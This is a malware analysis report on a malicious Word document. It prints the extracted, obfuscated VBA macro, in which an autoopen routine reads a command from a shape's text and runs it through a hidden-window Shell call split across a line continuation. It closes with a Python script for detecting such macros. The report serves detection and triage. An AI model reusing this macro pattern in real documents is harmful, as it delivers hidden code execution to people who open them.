Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 91b43ccdca4d7fc8…

MALICIOUS

Office (OLE)

Size: 80.9 KB
Created: 2018-12-07 12:06:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: 249e40e507762f76df63782f7937315a
SHA-1: edbee146d246d7951856f3a0b47a1b4f779992ae
SHA-256: 91b43ccdca4d7fc841c291b1919b56f6c7183c3e2f02b8a2d68995b1b85878f2
Risk Score: 292

Heuristics (10)

  • ClamAV: Doc.Malware.Generic-6775938-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Generic-6775938-0
  • VBA macros detected [medium, OLE_VBA_MACROS; 3 related findings]
    Document contains VBA macro code
  • Potential Shell call in VBA [critical, OLE_VBA_SHELL]
    Potential Shell call in VBA. The call is Interaction.Shell(APpTWwrKjR, tMFvLjNPjk), written across a VBA line continuation ("Interaction _" / ".Shell"), so a single-line search for "Interaction.Shell" does not find it. APpTWwrKjR is built from the text of a document shape (XUJihQUO.Shapes(...).TextFrame.ContainingRange) concatenated with variables that are never assigned in the extracted source, so the command line itself is not in the macro code and has to be recovered from the shape. tMFvLjNPjk is declared Const = 0, which is vbHide: the spawned process starts with a hidden window.
    Matched line in script
    wcjFbJIqD = Array(IGtOd, OZnkNahLV, QjToCq, Interaction _
    .Shell(APpTWwrKjR, tMFvLjNPjk), BZboK)
             Set djOilvYtjlkQIaocjzTaV = XJCUlTCYjvvhoFMSrB
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, and documents where source extraction fails, in which no visible source is available.
  • AutoOpen macro [low, OLE_VBA_AUTOOPEN]
    AutoOpen macro: Sub autoopen() runs when the document is opened and calls wIbwdw, the function that contains the Shell call.
    Matched line in script
    Attribute VB_Customizable = True
    Sub autoopen()
    wIbwdw
  • Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]
    Suspicious cmd.exe invocation with execution flag. No matched line is shown and the string does not appear in the extracted VBA source, so the match comes from content elsewhere in the file; since the macro reads its command string from a document shape's text, that shape is the likely carrier.
  • Reference to PowerShell [high, SC_STR_POWERSHELL]
    Reference to PowerShell. As with SC_STR_CMD, the string is not in the extracted macro source; the shape text is the place to look for the actual command line.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule is written for the case where no modern VBA project was recovered and no stronger macro-virus family marker was present, as analyst-facing evidence of old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was recovered (macros.bas, below), so the marker is almost certainly the same autoopen entry point already reported under OLE_VBA_AUTOOPEN and adds no independent evidence.
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All three URLs below are standard OpenXML schema namespace identifiers found in ordinary Word files and are not network indicators.
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6310 bytes
SHA-256: 520f4b98a1230ba076f03586cc6e31dcb3aca2af50fd89dd3e3f3a841882b087
Detection: ClamAV: No threats found
Obfuscation or payload: likely
160 of 197 identifiers look randomly generated (e.g. 'NYJKpjYjzXLdIjMLqHKfphMm') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XUJihQUO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
wIbwdw
End Sub

Attribute VB_Name = "BGWvAkEM"
Function wIbwdw()
On Error Resume Next
         Set rJdqYtdrjjlVmFS = qJXOcOCikhzVwnFAPlB
      owuWqfJkUTpFbOuCfQicGuG = tItsakGAEZjtOBYwFSOQruu
      tDUwHYltqDcimQJkNoBBi = nishXojpAzOJzX / CLng(105719826) * 48074940 / Tan(300584609) + npDLZpKoIiDCtsEsPqGZ - Cos(7013728) + (324872615 / Int(ADcUcRlUFvVOozcF))
         Set NhOcpVucQjuRfQ = pASIihDQliqdwzASnRmCiMW
      MBLJDFAozDOzEcQTJQczzrw = PQGztOKcdavjVuNfiCjs
      COLATsSkZrVDitmwAujsm = ijkzPDwSzLFtMCvwaV / CLng(291324390) * 292341181 / Tan(30029180) + acnBahiHwzzjkfQVdOnGu - Cos(64133978) + (329347156 / Int(jkDBUNAtPvFHKOdPoqOFvd))
         Set JncYJjnksMZAONlkUJCFD = barNVaEPHfiTzqnCrujXndu
      BzFXNrhOjTLCjwNMfdE = RuNuwRRHZfDzfQLWUjCQwUm
      flWvjTrKZAJGlKbvZZpA = NWQkrrzaovzIhPLvW / CLng(178631225) * 40351418 / Tan(260605398) + YfGEkJFGqYfmRRPFKobsjlE - Cos(80900960) + (334105544 / Int(vPzDwiNVprKfHiu))
         Set JSYDYiAurPLQHEGNah = atoUHPNzBtjHpR
      zRhNmSGQYUhiwEMQKZLOdVzQ = LjwBHHWzJFofMvhUdPAZjR
      ocZhdDUdUQZajHOQMLjmzYk = idtzFzqHuoKYhaswobTPmUwN / CLng(94327949) * 336230086 / Tan(260785939) + zivPrcDzJVXWZSfv - Cos(322013388) + (279548601 / Int(mTnzXEVKJfjlGJcKQsujF))
         Set snqiroMUozSMYQn = aWJNtPtjhGDAUc
      LHITbOnHjzJGHIdzvH = hKhzPcuKAllLALcHF
      zLonPZPkJmYEGHsDv = iJtqhEmWwlIuiAYj / CLng(329049754) * 318317489 / Tan(182373383) + vHifTImwidTwQRdvWHijBta - Cos(194616941) + (181796097 / Int(HXfWJwcAPWbNXZSpr))
Set XSVPzvpMm = XUJihQUO.Shapes(vKnatGf + "SGlzIjjiTIJaj" + pHnZwZ).TextFrame
         Set XXNiSjKuEAFnWzlDo = DCPDzRUvSwGIhw
      MiCZVuXdoXwztrPjIXc = RDUZwOXRLnvSHMJUid
      HjZajATaDDSwlFiJJK = dHXGSBbdqjhuziEVnrco / CLng(165044709) * 188144355 / Tan(258341246) + OspKNcDAJGAMkZHZEW - Cos(196676970) + (303850690 / Int(IUTjkrRhWDATCsZMQQ))
         Set HkbGfEFZsCijXjVcvPJHSTP = XQwlDkPMkdpjuR
      czLFtVJcwUnZhnFZn = ZjOHUWHmRwtrmiiBjI
      OWjNoAQPLiZiEBO = iAVipwGDLiFiEujGzT / CLng(167527313) * 328046285 / Tan(299730024) + aHDGwEsUppXOwBLdQQ - Cos(109314748) + (189194959 / Int(FuiKQCShlcQaNZ))
APpTWwrKjR = XSVPzvpMm.ContainingRange + lrdrkOk + CwtwFYV + hMoGQQn + llSmDAs + qpzdjdn + csOwodz + aEmBr + DquvicK
         Set jtdQNSzAkvpmDAs = SzpBMGuIEZSLvdiVFV
      waBNXTVwsNuTbaTi = zFwZzVLozmFHQUhhoutRmShr
      CvJFrlbujYzZlwF = ZXhQrbsMmmfaRLfYFSzZCi / CLng(49308975) * 9865591 / Tan(194288994) + kviICwobMuAbQaCw - Cos(128960434) + (33679567 / Int(BcVtaTTBfnrQfmd))
         Set tbuElJGSzhMbBGvfTi = aJDKUlzZBhHWJGRziZuIuw
      wbHLYsqzPrwwMpQZSmjFlsL = VkHRFYawbPFiNZ
      hKhriNJEKNzbWKtIGQE = nlZuqRzVwjhMtLCuDAjpMf / CLng(321804269) * 22484262 / Tan(39769293) + DmhHzRIjnwknBNNnIafniLHz - Cos(33343247) + (40523906 / Int(PiHoWosNNnpkQEKXFJPwT))
         Set nMwAiKKXUnVcLpZTtSNaCB = iojIdUacLwXfmOmC
      JhRcTCumanEDHanlBULwBh = tKJdnKnEHQaQVk
      KmoWChWZEXkuluaDlciXR = YHbnizmjKRBSJZJf / CLng(200408211) * 139507267 / Tan(152155674) + FFDQCKjMpoqMRANhuPwZm - Cos(152545283) + (91848479 / Int(sSkBtGwJAjETDLlXR))
         Set NkKtcuXpBncBdGDpOmQm = hYMzsuFwQQAGsPkitHL
      zTjnlsBwADrrvDjMwvjASrk = bulqTKVfFrZNoZLzsG
      NYJKpjYjzXLdIjMLqHKfphMm = dTXYjkHLsWwSkv / CLng(49685033) * 307856936 / Tan(200966597) + HtORdbNUrhaJjMWGLQA - Cos(49183966) + (90251771 / Int(ERPNOsGLDkKJEspLpvLOsZ))
         Set UaYDjHjrFctNlQEzuqPiii = vjzjXSuEuYRzNhjkq
      mPGLZGSGFzGfmLqJdXjbL = KXwoTTrRNFZssOLjGqO
      MwzPmGHEEJBPZOEiN = nzPnkAFtSbzuQsNuLOZiB / CLng(86496961) * 79716978 / Tan(253441558) + EEJSiJcVVDOBYMwJ - Cos(297209214) + (262293952 / Int(GJsJCfCqIfkZndajwwao))
         Set vlTdRMkQoaLZKQWtkXlESwK = YaXqBXFwijkuDzfQrv
      MnKscmfzTPIczb = FqptORVNqbjcplrVMXwzjNiv
      WamjaGnSHupawj = raUQvJpLbtvEBdLrItosr / CLng(230862830) * 198040712 / Tan(103351491) + tJirCuNrKFJtRzujOK - Cos(273442277) + (204590942 / Int(lpvDjhJnuIwEvC))
         Set pwlcpcXQiTXsmLhiXNn = OzAprGQqLiUiavSEpTW
      sICdwSpjqhzHWbJpwwkiM = EzztSrsdoErBjGzWqZQhz
      hMIwlcGtinYLDCiFzwqN = sQUsDsbFLRfiaSmkTFPXvWD / CLng(188987305) * 156576237 / Tan(16621550) + rlZSqlkownGikinXVtddksU - Cos(212006906) + (292093500 / Int(qzWMsUAwkUlzpwpdpwN))
         Set jHTcviVjDmdJZaoIV = wninwniLDsijZocwNFVsBQDN
      ETiVqEzTqRojwJjzjbdwW = pjaNjmcvijUFuUAq
      nkNjXoPQwpvRoaPL = dzudVLquiEPqPMztOpNJdSs / CLng(77553690) * 318523415 / Tan(257245322) + hdtJEuCqCvjRZXookzajdzYa - Cos(238072012) + (16754533 / Int(OKFjhiOIQouLwM))
Const tMFvLjNPjk = 0
         Set uznNLfNmCwsaFVzwvGnMGw = PtzffkvzWsiAzCK
      cMomoLRSCDGQwOOjw = YTNAiBGwViaVzukoKzRJTDc
      cbifzIdvBHirEcinfqqj = hEMfJDPSoXUriYGXbzNEfTs / CLng(103517836) * 300050752 / Tan(239899355) + UiddNsmvXSzpFOcNkJAVE - Cos(158777295) + (102343731 / Int(qdiMNLwlZVuoKt))
wcjFbJIqD = Array(IGtOd, OZnkNahLV, QjToCq, Interaction _
.Shell(APpTWwrKjR, tMFvLjNPjk), BZboK)
         Set djOilvYtjlkQIaocjzTaV = XJCUlTCYjvvhoFMSrB
      imZBnTqhSzYBmNIIEcQKE = LEpUamiPNIRrqhwIPAumjaI
      JTfzIqarinbULSsEwCjQkuX = KwNPPRHkwvLGHlHXhaM / CLng(19378524) * 43277019 / Tan(194917554) + wIpnhrrJOwEnLcKbMjqXQGlz - Cos(89265509) + (309613116 / Int(iJiUUjAQHaiatEmz))
         Set PnwSuDklAUppVpzILEU = DrnjAAnhablVqdjTS
      XXYuVlCjtakVFzL = XXzQRtPCLZiTwr
      jqEhwqJWCiTHMzEV = JoGITCpdHVivCihBRDfARP / CLng(73423292) * 90136867 / Tan(7432017) + lwlDFHDwJJlBNoPDoVabzvmG - Cos(307633704) + (302618590 / Int(VVudsHWQrsEPbsGYXPQ))
         Set IkouAfSDHVJUwjkLI = mWHmKDzVijcqIjJaYfj
      kUYwCjMEUzZcOHvGHWalv = AlaQMaLWLFiXoRwIjdqu
      jHzcAoCTCEvoFU = XmTmtzmUwrTiIwmwuBcTib / CLng(263646254) * 77922982 / Tan(250061267) + CJAjiizLlwKEADu - Cos(251685683) + (7147821 / Int(hJtUPIAncAIvwHAkvdUOJ))
         Set pjnrETwoiIwwTu = mMSwswpCFYNMXTHDQWFfFSp
      GjYQwvKMPzjJjUUDzj = SrGYUWEicNPmUWzrJZYGK
      BzXjzXwBBfYlXcAK = tsMiwANPnjcLib / CLng(176928045) * 151430902 / Tan(27980359) + JBkYjlbMkNjzXqzVfNzfCz - Cos(66801400) + (133664834 / Int(qTpXEzOTmrJTVLbG))
End Function
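The checks behind the OLE_VBA_AUTOOPEN and OLE_VBA_SHELL findings and the "identifiers look randomly generated" score, re-implemented as an added example that is not the analysis platform's code or part of the sample. It uses only the Python standard library. The VBA text inside it is constructed to mirror the macros.bas preview above (same entry point, same line-continued Interaction.Shell call, same Const window style), not the real extracted file; WINDOW_STYLES holds VBA's VbAppWinStyle values, and the randomness thresholds in looks_random are this example's own choice, so its count will not match the report's 160 of 197.

```python
"""Static triage of extracted VBA: auto-exec entry points, Shell calls
(with VBA line continuations joined) and a name-mangling score."""
import re

# Constructed sample modelled on the macros.bas preview (not the real file).
SAMPLE_VBA = r'''
Attribute VB_Name = "XUJihQUO"
Sub autoopen()
wIbwdw
End Sub

Function wIbwdw()
On Error Resume Next
Set rJdqYtdrjjlVmFS = qJXOcOCikhzVwnFAPlB
tDUwHYltqDcimQJkNoBBi = nishXojpAzOJzX / CLng(105719826) * 48074940 / Tan(300584609) + npDLZpKoIiDCtsEsPqGZ - Cos(7013728) + (324872615 / Int(ADcUcRlUFvVOozcF))
Set XSVPzvpMm = XUJihQUO.Shapes(vKnatGf + "SGlzIjjiTIJaj" + pHnZwZ).TextFrame
APpTWwrKjR = XSVPzvpMm.ContainingRange + lrdrkOk + CwtwFYV
Const tMFvLjNPjk = 0
wcjFbJIqD = Array(IGtOd, OZnkNahLV, Interaction _
.Shell(APpTWwrKjR, tMFvLjNPjk), BZboK)
End Function
'''

# Keywords/builtins that are not user-defined identifiers (partial list).
VBA_RESERVED = {w.lower() for w in """
Attribute Sub Function End Set On Error Resume Next Const Array Dim As If
Then Else For To Each In Do Loop While Wend Call Exit True False Nothing
New Private Public CLng CInt CStr Int Tan Cos Sin Chr Asc Len Mid Left
Right Replace Shell Interaction Shapes TextFrame ContainingRange
CreateObject GetObject ThisDocument""".split()}

# Window-style argument of Shell(), from VBA's VbAppWinStyle enumeration.
WINDOW_STYLES = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                 3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}

AUTOEXEC_RE = re.compile(
    r"^(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(AutoOpen|AutoExec|AutoClose|"
    r"AutoNew|AutoExit|Auto_Open|Document_Open|Document_Close|Workbook_Open)\s*\(", re.I)
SHELL_RE = re.compile(
    r"\b(?:Interaction\s*\.\s*|VBA\s*\.\s*)?Shell\s*\(([^,\)]*)(?:,\s*([^\)]*))?\)", re.I)
CONST_RE = re.compile(r"^Const\s+(\w+)\s*=\s*(-?\d+)", re.I)
IDENT_RE = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")


def logical_lines(src):
    """Join VBA line continuations (' _' at end of line) so each statement is
    one string; per-physical-line matching misses 'Interaction _' / '.Shell('."""
    joined = re.sub(r"[ \t]_[ \t]*\r?\n[ \t]*", " ", src)
    return [ln.strip() for ln in joined.splitlines() if ln.strip()]


def find_autoexec(src):
    """Names of auto-execution entry points declared in the source."""
    return [m.group(1) for ln in logical_lines(src)
            for m in [AUTOEXEC_RE.match(ln)] if m]


def find_shell_calls(src):
    """Shell(...) calls with the command expression and the window style,
    resolving a Const used as the style argument (0 => vbHide)."""
    lines = logical_lines(src)
    consts = {m.group(1).lower(): int(m.group(2))
              for ln in lines for m in [CONST_RE.match(ln)] if m}
    calls = []
    for ln in lines:
        m = SHELL_RE.search(ln)
        if not m:
            continue
        arg = (m.group(2) or "").strip()
        if arg.lstrip("-").isdigit():
            style = int(arg)
        else:  # omitted style means vbMinimizedFocus; unknown names stay None
            style = consts.get(arg.lower(), 2 if arg == "" else None)
        calls.append({"statement": ln, "command_expr": m.group(1).strip(),
                      "window_style": style,
                      "window_style_name": WINDOW_STYLES.get(style, "unresolved")})
    return calls


def identifiers(src):
    """User-defined identifiers in order of first appearance, ignoring
    Attribute lines, string literals, comments and reserved words."""
    seen = []
    for ln in logical_lines(src):
        if ln.lower().startswith("attribute "):
            continue
        ln = re.sub(r'"[^"]*"', '""', ln).split("'", 1)[0]
        for tok in IDENT_RE.findall(ln):
            if tok.lower() not in VBA_RESERVED and tok not in seen:
                seen.append(tok)
    return seen


def looks_random(name):
    """Name-mangling heuristic (thresholds are this example's choice): long and
    nearly vowel-free, or flipping case at least every other letter."""
    letters = [c for c in name if c.isalpha()]
    if len(name) < 8 or len(letters) < 2:
        return False
    vowel_ratio = sum(c.lower() in "aeiou" for c in letters) / len(letters)
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return vowel_ratio < 0.2 or flips / (len(letters) - 1) >= 0.5


def mangling_score(src):
    """(random-looking identifiers, total identifiers)."""
    ids = identifiers(src)
    return sum(looks_random(i) for i in ids), len(ids)


if __name__ == "__main__":
    print("auto-exec:", find_autoexec(SAMPLE_VBA))
    for c in find_shell_calls(SAMPLE_VBA):
        print("Shell:", c["command_expr"], "style", c["window_style"], c["window_style_name"])
    print("mangled identifiers: %d of %d" % mangling_score(SAMPLE_VBA))
```

Run against the real macros.bas, the useful outputs are the resolved window style (0, hidden) and the command expression, which points at the shape whose text holds the actual command line; the identifier score is only a prioritisation signal, since it also fires on heavily minified but benign code.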